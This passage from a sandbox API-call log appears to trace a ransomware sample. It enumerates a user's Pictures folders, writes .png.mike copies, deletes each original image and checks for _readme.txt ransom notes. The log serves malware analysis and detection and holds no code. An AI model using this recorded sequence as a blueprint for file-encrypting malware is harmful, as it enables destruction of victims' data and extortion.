(dwNewMode=0x0, lpOldMode=0x2af00c) returned 1 [0155.072] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefac) returned 1 [0155.072] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefa8) returned 1 [0155.073] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0155.073] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0155.074] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef9c) returned 1 [0155.074] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef98) returned 1 [0155.075] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefac) returned 1 [0155.075] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefa8) returned 1 [0155.076] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef9c) returned 1 [0155.076] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef98) returned 1 [0155.077] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefac) returned 1 [0155.077] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefa8) returned 1 [0155.078] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef9c) returned 1 [0155.078] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef98) returned 1 [0155.078] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefac) returned 1 [0155.079] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefa8) returned 1 [0155.079] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefb4) returned 1 [0155.079] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefb0) returned 1 [0155.081] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\jgxj8NICsf0.png.mike", nBufferLength=0x105, lpBuffer=0x2aec48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\jgxj8NICsf0.png.mike", lpFilePart=0x0) returned 0x6f [0155.081] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0155.081] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0155.081] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\jgxj8NICsf0.png.mike", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\jgxj8NICsf0.png.mike", lpFilePart=0x0) returned 0x6f [0155.082] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0155.082] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0155.082] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\jgxj8NICsf0.png", dwFileAttributes=0x80) returned 1 [0155.083] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\jgxj8NICsf0.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\wpjjdiycybxa2lnq5xg7\\6onzwn8piewfkyh7zz\\wroof2dw16y\\jgxj8nicsf0.png")) returned 1 [0155.084] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0155.085] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0155.085] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeae4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\_readme.txt", lpFilePart=0x0) returned 0x66 [0155.085] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefd8) returned 1 [0155.086] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefd4) returned 1 [0155.087] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af15c) returned 1 [0155.087] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x712fd260, ftCreationTime.dwHighDateTime=0x1d4d044, ftLastAccessTime.dwLowDateTime=0x25b93cc0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x25b93cc0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0155.087] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81227450, ftCreationTime.dwHighDateTime=0x1d4cf4c, ftLastAccessTime.dwLowDateTime=0xd86dc120, ftLastAccessTime.dwHighDateTime=0x1d4c564, ftLastWriteTime.dwLowDateTime=0xd86dc120, ftLastWriteTime.dwHighDateTime=0x1d4c564, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="99q8DF", cAlternateFileName="")) returned 1 [0155.088] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x15b37950, ftCreationTime.dwHighDateTime=0x1d4cb76, ftLastAccessTime.dwLowDateTime=0xb88d6780, ftLastAccessTime.dwHighDateTime=0x1d4d292, ftLastWriteTime.dwLowDateTime=0xb88d6780, ftLastWriteTime.dwHighDateTime=0x1d4d292, nFileSizeHigh=0x0, nFileSizeLow=0xe216, dwReserved0=0x0, dwReserved1=0x0, cFileName="H54h gwe88d1.bmp", cAlternateFileName="H54HGW~1.BMP")) returned 1 [0155.088] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25b6db60, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x25b6db60, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x25b6db60, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x68a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jgxj8NICsf0.png.mike", cAlternateFileName="JGXJ8N~1.MIK")) returned 1 [0155.088] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa5ef2800, ftCreationTime.dwHighDateTime=0x1d4ce70, ftLastAccessTime.dwLowDateTime=0x7f981b80, ftLastAccessTime.dwHighDateTime=0x1d4cee3, ftLastWriteTime.dwLowDateTime=0x7f981b80, ftLastWriteTime.dwHighDateTime=0x1d4cee3, nFileSizeHigh=0x0, nFileSizeLow=0xe7db, dwReserved0=0x0, dwReserved1=0x0, cFileName="PpaypRFbyCiXvD.bmp", cAlternateFileName="PPAYPR~1.BMP")) returned 1 [0155.089] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25b93cc0, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x25b93cc0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x25b93cc0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0155.089] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25b93cc0, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x25b93cc0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x25b93cc0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0155.090] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0155.090] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af11c) returned 1 [0155.090] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af128) returned 1 [0155.090] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0155.090] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.090] CoTaskMemFree (pv=0x508980) [0155.090] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0155.091] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\99q8DF", nBufferLength=0x105, lpBuffer=0x2aec4c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\99q8DF", lpFilePart=0x0) returned 0x61 [0155.091] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af114) returned 1 [0155.091] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81227450, ftCreationTime.dwHighDateTime=0x1d4cf4c, ftLastAccessTime.dwLowDateTime=0xd86dc120, ftLastAccessTime.dwHighDateTime=0x1d4c564, ftLastWriteTime.dwLowDateTime=0xd86dc120, ftLastWriteTime.dwHighDateTime=0x1d4c564, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0155.092] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0d4) returned 1 [0155.092] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e0) returned 1 [0155.093] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af044) returned 1 [0155.093] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af040) returned 1 [0155.093] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0d8) returned 1 [0155.093] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0155.094] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0d4) returned 1 [0155.094] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0155.094] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0155.094] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0155.095] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\99q8DF\\jmQBS2LKR-t.png.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\99q8DF\\jmQBS2LKR-t.png.mike", lpFilePart=0x0) returned 0x76 [0155.095] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\99q8DF\\jmQBS2LKR-t.png", nBufferLength=0x105, lpBuffer=0x2aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\99q8DF\\jmQBS2LKR-t.png", lpFilePart=0x0) returned 0x71 [0155.101] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\99q8DF\\jmQBS2LKR-t.png.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\99q8DF\\jmQBS2LKR-t.png.mike", lpFilePart=0x0) returned 0x76 [0155.101] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\99q8DF\\jmQBS2LKR-t.png.mike", nBufferLength=0x105, lpBuffer=0x2aebfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\99q8DF\\jmQBS2LKR-t.png.mike", lpFilePart=0x0) returned 0x76 [0155.101] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\99q8DF\\jmQBS2LKR-t.png", dwFileAttributes=0x80) returned 1 [0155.102] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\99q8DF\\jmQBS2LKR-t.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\wpjjdiycybxa2lnq5xg7\\6onzwn8piewfkyh7zz\\wroof2dw16y\\99q8df\\jmqbs2lkr-t.png")) returned 1 [0155.104] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\99q8DF\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aea9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\99q8DF\\_readme.txt", lpFilePart=0x0) returned 0x6d [0155.105] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0155.105] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\99q8DF\\JPoWRBvwhI sYT.png.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\99q8DF\\JPoWRBvwhI sYT.png.mike", lpFilePart=0x0) returned 0x79 [0155.106] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\99q8DF\\JPoWRBvwhI sYT.png", nBufferLength=0x105, lpBuffer=0x2aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\99q8DF\\JPoWRBvwhI sYT.png", lpFilePart=0x0) returned 0x74 [0155.111] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\99q8DF\\JPoWRBvwhI sYT.png.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\99q8DF\\JPoWRBvwhI sYT.png.mike", lpFilePart=0x0) returned 0x79 [0155.111] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\99q8DF\\JPoWRBvwhI sYT.png.mike", nBufferLength=0x105, lpBuffer=0x2aebfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\99q8DF\\JPoWRBvwhI sYT.png.mike", lpFilePart=0x0) returned 0x79 [0155.111] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\99q8DF\\JPoWRBvwhI sYT.png", dwFileAttributes=0x80) returned 1 [0155.112] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\99q8DF\\JPoWRBvwhI sYT.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\wpjjdiycybxa2lnq5xg7\\6onzwn8piewfkyh7zz\\wroof2dw16y\\99q8df\\jpowrbvwhi syt.png")) returned 1 [0155.114] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\99q8DF\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aea9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\99q8DF\\_readme.txt", lpFilePart=0x0) returned 0x6d [0155.116] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0155.116] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\99q8DF\\w3yb2C.png.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\99q8DF\\w3yb2C.png.mike", lpFilePart=0x0) returned 0x71 [0155.116] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\99q8DF\\w3yb2C.png", nBufferLength=0x105, lpBuffer=0x2aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\99q8DF\\w3yb2C.png", lpFilePart=0x0) returned 0x6c [0155.122] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\99q8DF\\w3yb2C.png.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\99q8DF\\w3yb2C.png.mike", lpFilePart=0x0) returned 0x71 [0155.122] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\99q8DF\\w3yb2C.png.mike", nBufferLength=0x105, lpBuffer=0x2aebfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\99q8DF\\w3yb2C.png.mike", lpFilePart=0x0) returned 0x71 [0155.123] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\99q8DF\\w3yb2C.png", dwFileAttributes=0x80) returned 1 [0155.123] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\99q8DF\\w3yb2C.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\wpjjdiycybxa2lnq5xg7\\6onzwn8piewfkyh7zz\\wroof2dw16y\\99q8df\\w3yb2c.png")) returned 1 [0155.125] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\99q8DF\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aea9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\99q8DF\\_readme.txt", lpFilePart=0x0) returned 0x6d [0155.127] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0155.127] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\99q8DF\\x6taBtUDQqI2UMcsGHO.png.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\99q8DF\\x6taBtUDQqI2UMcsGHO.png.mike", lpFilePart=0x0) returned 0x7e [0155.128] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\99q8DF\\x6taBtUDQqI2UMcsGHO.png", nBufferLength=0x105, lpBuffer=0x2aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\99q8DF\\x6taBtUDQqI2UMcsGHO.png", lpFilePart=0x0) returned 0x79 [0155.138] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\99q8DF\\x6taBtUDQqI2UMcsGHO.png.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\99q8DF\\x6taBtUDQqI2UMcsGHO.png.mike", lpFilePart=0x0) returned 0x7e [0155.138] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\99q8DF\\x6taBtUDQqI2UMcsGHO.png.mike", nBufferLength=0x105, lpBuffer=0x2aebfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\99q8DF\\x6taBtUDQqI2UMcsGHO.png.mike", lpFilePart=0x0) returned 0x7e [0155.138] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\99q8DF\\x6taBtUDQqI2UMcsGHO.png", dwFileAttributes=0x80) returned 1 [0155.139] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\99q8DF\\x6taBtUDQqI2UMcsGHO.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\wpjjdiycybxa2lnq5xg7\\6onzwn8piewfkyh7zz\\wroof2dw16y\\99q8df\\x6tabtudqqi2umcsgho.png")) returned 1 [0155.142] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\99q8DF\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aea9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\99q8DF\\_readme.txt", lpFilePart=0x0) returned 0x6d [0155.143] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0155.143] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.144] CoTaskMemFree (pv=0x508980) [0155.144] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0155.144] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS 